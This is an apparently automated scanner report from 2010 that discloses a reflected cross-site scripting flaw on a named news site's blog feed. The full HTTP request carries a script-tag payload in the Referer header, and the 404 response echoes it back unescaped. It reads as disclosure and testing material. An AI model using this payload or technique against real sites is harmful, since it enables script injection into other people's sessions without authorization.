This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sports/hsblog/index.xml HTTP/1.1
Host: centralmaine.mainetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8f903"><script>alert(1)</script>5f03991dd7e

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:01:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 567
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<title>Error 404</title>
<style type="text/css">
body {
background-color:#efefef;
color:#999999;
}
</style>
</head>
<body>
<div align="center">
<h1>Error 404<
...[SNIP]...
<a href="http://http://www.google.com/search?hl=en&q=8f903"><script>alert(1)</script>5f03991dd7e/">
...[SNIP]...

Report generated by XSS.CX at Tue Nov 30 10:29:55 CST 2010.